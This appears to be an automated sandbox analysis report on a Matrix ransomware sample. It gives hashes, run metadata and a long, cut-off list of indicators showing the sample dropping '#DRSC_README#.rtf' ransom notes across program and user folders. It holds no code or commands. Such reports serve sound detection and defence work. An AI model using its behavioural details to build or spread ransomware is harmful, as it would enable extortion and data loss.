Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
08-10-2020 15:06
Static task
static1
Behavioral task
behavioral1
Sample
710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe
Resource
win7v200722
Behavioral task
behavioral2
Sample
710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe
Resource
win10v200722
General
-
Target
710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe
-
Size
1.2MB
-
MD5
67fec6ab8e3a8b74aa742f8b365cdbca
-
SHA1
e36e647e055aeeb94a3f1e3e16fb6968c30d73ec
-
SHA256
710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb
-
SHA512
5dcae0d0181ad4684a9c4d88f1b93948c1b42d9ed4cf5ed7ee86052b57d2fa38b4a3024d837f758dc4b63a49e66fd64135bc58bb839cb00db648494fed749ffe
Malware Config
Signatures
-
Matrix Ransomware 1816 IoCs
Targeted ransomware with information collection and encryption functionality.
description flow ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Window.2\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\_platform_specific\win_x64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\epdf\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\lt\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ar-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cookie\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\ProgramData\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\en-GB\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\ProgramData\Mozilla\updates\308046B0AF4A39CB\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\55E75A3F-8E75-41E5-8961-48B2B983CD6C\en-us.16\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Favorites\Links\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ko\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick.2\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\.oracle_jre_usage\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Saved Games\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\LocalLow\Oracle\Java\AU\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\he-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\gl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\amd64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ug\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tn-ZA\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\UProof\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Pictures\Saved Pictures\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sr-Latn-RS\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\All Users\Microsoft\MF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-sl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\be\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280809\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-il\#DRSC_README#.rtf 